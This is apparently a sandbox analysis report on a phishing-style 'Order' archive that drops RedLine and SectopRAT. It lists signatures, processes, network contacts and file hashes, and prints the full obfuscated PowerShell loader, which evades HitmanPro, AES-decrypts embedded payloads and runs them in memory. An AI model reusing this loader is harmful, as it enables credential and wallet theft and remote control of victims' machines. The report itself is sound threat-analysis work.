Analysis Overview
SHA256
1e25a7bc0db9281c42da2da851051566e291a19839ae4203b8b8c0f70979d1ea
Threat Level: Known bad
The file Order Nº TM24-10-08.tar was found to be: Known bad.
Malicious Activity Summary
SectopRAT
SectopRAT payload
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Accesses cryptocurrency files/wallets, possible credential harvesting
System Location Discovery: System Language Discovery
Modifies Internet Explorer settings
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-08 10:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:36
Platform
win7-20240903-en
Max time kernel
104s
Max time network
19s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1848 wrote to memory of 2952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1848 wrote to memory of 2952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1848 wrote to memory of 2952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat';$DXzR='ReamnDpdLmnDpinmnDpesmnDp'.Replace('mnDp', ''),'EntbEvvrybEvvPbEvvoinbEvvtbEvv'.Replace('bEvv', ''),'FromvYVmmvYVBmvYVamvYVsmvYVe6mvYV4SmvYVtrmvYVingmvYV'.Replace('mvYV', ''),'SpeSWZliteSWZ'.Replace('eSWZ', ''),'DePsMkcoPsMkmpPsMkrPsMkesPsMksPsMk'.Replace('PsMk', ''),'ChrhhOarhhOnrhhOgrhhOeExrhhOtenrhhOsirhhOorhhOnrhhO'.Replace('rhhO', ''),'GetALBtCtALButALBrrtALBentALBtPtALBrotALBctALBestALBstALB'.Replace('tALB', ''),'InIMkLvoIMkLkeIMkL'.Replace('IMkL', ''),'LoIpdGaIpdGdIpdG'.Replace('IpdG', ''),'CopOzUZyToOzUZ'.Replace('OzUZ', ''),'EleThfYmenThfYtThfYAThfYtThfY'.Replace('ThfY', ''),'MaOxpNinMOxpNoOxpNdOxpNuOxpNleOxpN'.Replace('OxpN', ''),'CIQANreaIQANteDIQANeIQANcrIQANyIQANptoIQANrIQAN'.Replace('IQAN', ''),'TofCFraofCFnofCFsfoofCFrmofCFFiofCFnaofCFlofCFBofCFlocofCFkofCF'.Replace('ofCF', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($DXzR[6])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function bDdfx($DCabq){$PkWMx=[System.Security.Cryptography.Aes]::Create();$PkWMx.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PkWMx.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PkWMx.Key=[System.Convert]::($DXzR[2])('2mOYEaPt8lWctq01VMMqhN34VnXfkC7nLbHLQY7/Qz8=');$PkWMx.IV=[System.Convert]::($DXzR[2])('dCF02IjSKAA6m1jMUv5SoQ==');$AcKBd=$PkWMx.($DXzR[12])();$MScdO=$AcKBd.($DXzR[13])($DCabq,0,$DCabq.Length);$AcKBd.Dispose();$PkWMx.Dispose();$MScdO;}function DOVto($DCabq){$BTfcL=New-Object System.IO.MemoryStream(,$DCabq);$KMREB=New-Object System.IO.MemoryStream;$ushEi=New-Object System.IO.Compression.GZipStream($BTfcL,[IO.Compression.CompressionMode]::($DXzR[4]));$ushEi.($DXzR[9])($KMREB);$ushEi.Dispose();$BTfcL.Dispose();$KMREB.Dispose();$KMREB.ToArray();}$McwgB=[System.IO.File]::($DXzR[0])([Console]::Title);$cTfVJ=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 5).Substring(2))));$nYDNp=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 6).Substring(2))));[System.Reflection.Assembly]::($DXzR[8])([byte[]]$nYDNp).($DXzR[1]).($DXzR[7])($null,$null);[System.Reflection.Assembly]::($DXzR[8])([byte[]]$cTfVJ).($DXzR[1]).($DXzR[7])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/3052-2-0x0000000074231000-0x0000000074232000-memory.dmp
memory/3052-3-0x0000000074230000-0x00000000747DB000-memory.dmp
memory/3052-4-0x0000000074230000-0x00000000747DB000-memory.dmp
memory/3052-5-0x0000000074230000-0x00000000747DB000-memory.dmp
memory/3052-6-0x0000000074230000-0x00000000747DB000-memory.dmp
memory/3052-7-0x0000000074230000-0x00000000747DB000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:37
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
94s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat';$DXzR='ReamnDpdLmnDpinmnDpesmnDp'.Replace('mnDp', ''),'EntbEvvrybEvvPbEvvoinbEvvtbEvv'.Replace('bEvv', ''),'FromvYVmmvYVBmvYVamvYVsmvYVe6mvYV4SmvYVtrmvYVingmvYV'.Replace('mvYV', ''),'SpeSWZliteSWZ'.Replace('eSWZ', ''),'DePsMkcoPsMkmpPsMkrPsMkesPsMksPsMk'.Replace('PsMk', ''),'ChrhhOarhhOnrhhOgrhhOeExrhhOtenrhhOsirhhOorhhOnrhhO'.Replace('rhhO', ''),'GetALBtCtALButALBrrtALBentALBtPtALBrotALBctALBestALBstALB'.Replace('tALB', ''),'InIMkLvoIMkLkeIMkL'.Replace('IMkL', ''),'LoIpdGaIpdGdIpdG'.Replace('IpdG', ''),'CopOzUZyToOzUZ'.Replace('OzUZ', ''),'EleThfYmenThfYtThfYAThfYtThfY'.Replace('ThfY', ''),'MaOxpNinMOxpNoOxpNdOxpNuOxpNleOxpN'.Replace('OxpN', ''),'CIQANreaIQANteDIQANeIQANcrIQANyIQANptoIQANrIQAN'.Replace('IQAN', ''),'TofCFraofCFnofCFsfoofCFrmofCFFiofCFnaofCFlofCFBofCFlocofCFkofCF'.Replace('ofCF', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($DXzR[6])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function bDdfx($DCabq){$PkWMx=[System.Security.Cryptography.Aes]::Create();$PkWMx.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PkWMx.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PkWMx.Key=[System.Convert]::($DXzR[2])('2mOYEaPt8lWctq01VMMqhN34VnXfkC7nLbHLQY7/Qz8=');$PkWMx.IV=[System.Convert]::($DXzR[2])('dCF02IjSKAA6m1jMUv5SoQ==');$AcKBd=$PkWMx.($DXzR[12])();$MScdO=$AcKBd.($DXzR[13])($DCabq,0,$DCabq.Length);$AcKBd.Dispose();$PkWMx.Dispose();$MScdO;}function DOVto($DCabq){$BTfcL=New-Object System.IO.MemoryStream(,$DCabq);$KMREB=New-Object System.IO.MemoryStream;$ushEi=New-Object System.IO.Compression.GZipStream($BTfcL,[IO.Compression.CompressionMode]::($DXzR[4]));$ushEi.($DXzR[9])($KMREB);$ushEi.Dispose();$BTfcL.Dispose();$KMREB.Dispose();$KMREB.ToArray();}$McwgB=[System.IO.File]::($DXzR[0])([Console]::Title);$cTfVJ=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 5).Substring(2))));$nYDNp=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 6).Substring(2))));[System.Reflection.Assembly]::($DXzR[8])([byte[]]$nYDNp).($DXzR[1]).($DXzR[7])($null,$null);[System.Reflection.Assembly]::($DXzR[8])([byte[]]$cTfVJ).($DXzR[1]).($DXzR[7])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 51.195.145.71:26398 | 51.195.145.71 | tcp |
| US | 8.8.8.8:53 | 71.145.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.12.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 31.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/4316-0-0x0000000074A4E000-0x0000000074A4F000-memory.dmp
memory/4316-1-0x0000000002520000-0x0000000002556000-memory.dmp
memory/4316-2-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/4316-3-0x0000000004EE0000-0x0000000005508000-memory.dmp
memory/4316-4-0x0000000004E70000-0x0000000004E92000-memory.dmp
memory/4316-6-0x00000000057E0000-0x0000000005846000-memory.dmp
memory/4316-7-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/4316-5-0x0000000005680000-0x00000000056E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ydznscy.pyh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4316-17-0x0000000005850000-0x0000000005BA4000-memory.dmp
memory/4316-18-0x0000000005D40000-0x0000000005D5E000-memory.dmp
memory/4316-19-0x0000000005D80000-0x0000000005DCC000-memory.dmp
memory/4316-20-0x0000000006EE0000-0x0000000006F24000-memory.dmp
memory/4316-21-0x0000000007050000-0x00000000070C6000-memory.dmp
memory/4316-22-0x0000000007750000-0x0000000007DCA000-memory.dmp
memory/4316-23-0x00000000070F0000-0x000000000710A000-memory.dmp
memory/3044-24-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/3044-25-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/3044-26-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/3044-38-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/4316-39-0x0000000007290000-0x00000000072C6000-memory.dmp
memory/4316-40-0x00000000072C0000-0x00000000072DE000-memory.dmp
memory/4316-41-0x00000000083F0000-0x0000000008A08000-memory.dmp
memory/4316-42-0x0000000007380000-0x0000000007392000-memory.dmp
memory/4316-43-0x00000000073E0000-0x000000000741C000-memory.dmp
memory/4316-44-0x0000000007610000-0x000000000771A000-memory.dmp
memory/4316-45-0x0000000074A4E000-0x0000000074A4F000-memory.dmp
memory/4316-46-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/4316-47-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/4316-48-0x0000000008020000-0x00000000081E2000-memory.dmp
memory/4316-49-0x0000000008F40000-0x000000000946C000-memory.dmp
memory/4316-50-0x0000000009A20000-0x0000000009FC4000-memory.dmp
memory/4316-75-0x00000000082D0000-0x0000000008362000-memory.dmp
memory/4316-76-0x0000000008A10000-0x0000000008A2E000-memory.dmp
memory/4316-77-0x0000000074A40000-0x00000000751F0000-memory.dmp
memory/4316-78-0x0000000074A40000-0x00000000751F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp3CD.tmp
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\tmp3E2.tmp
| MD5 | eb8c6139f83c330881b13ec4460d5a39 |
| SHA1 | 837283823a7e4e107ca7e39b1e7c3801841b1ef8 |
| SHA256 | 489d5195735786050c4115677c5856e3ce72c3ecf2574be55021ad3d71caf40e |
| SHA512 | 88411dca362f0d9da0c093e60bf2b083340d0682b5ac91f25c78ac419cec1e325d0a5a0f96fd447d3d3806813cad7f1ca8cf9c423061327fbd16c8662f3cbddf |
C:\Users\Admin\AppData\Local\Temp\tmp40E.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmp423.tmp
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\tmp439.tmp
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmp464.tmp
| MD5 | 40f3eb83cc9d4cdb0ad82bd5ff2fb824 |
| SHA1 | d6582ba879235049134fa9a351ca8f0f785d8835 |
| SHA256 | cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0 |
| SHA512 | cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 25810771f9d970392716c34ce6220e28 |
| SHA1 | a46a92888ab77738de53813cd21a9283a0f0af6e |
| SHA256 | f4320541a7814040ef5871ebb098b48b227d3cace57188ee020e9ca5f184b6e0 |
| SHA512 | 7d1037ce5ec668646bc86d08aee3c5db6419d054f5f60f794f8764991cd0506d72d15d2d22e0f8d4adde8a7921d192aafcec4f3824a409de4a1e57ba5a7a6e33 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 928d36ad618a369ffebf44885d07cf81 |
| SHA1 | edf5a353a919c1873af8e6a0dfafa4c38c626975 |
| SHA256 | d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea |
| SHA512 | 4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a |
memory/4316-237-0x0000000074A40000-0x00000000751F0000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:37
Platform
win7-20240729-en
Max time kernel
94s
Max time network
17s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Processes
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.pdf"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | bdf4b196b56bd4f34dd9bfb2efffd6ec |
| SHA1 | 88b75f77b177ce223e462e667dbbca6b91e8f15b |
| SHA256 | 9c66ac492238d43306ac796e1248b6734c61f8b41d5f6ed824a07827bf9dde12 |
| SHA512 | a2eef91930f994a9136a4d6746061e68333e5cb2eff7b69b0ba3471df4ddf8d11ca0c6c37193ce93279501c16ef24f3de4ab7d588984bb0796fcfaed02927e2a |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:36
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.pdf"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9F45627ADEFD7818AA9AC79350B22577 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A1B32E6BFF3D6BD688D3C53C33B8F5D7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6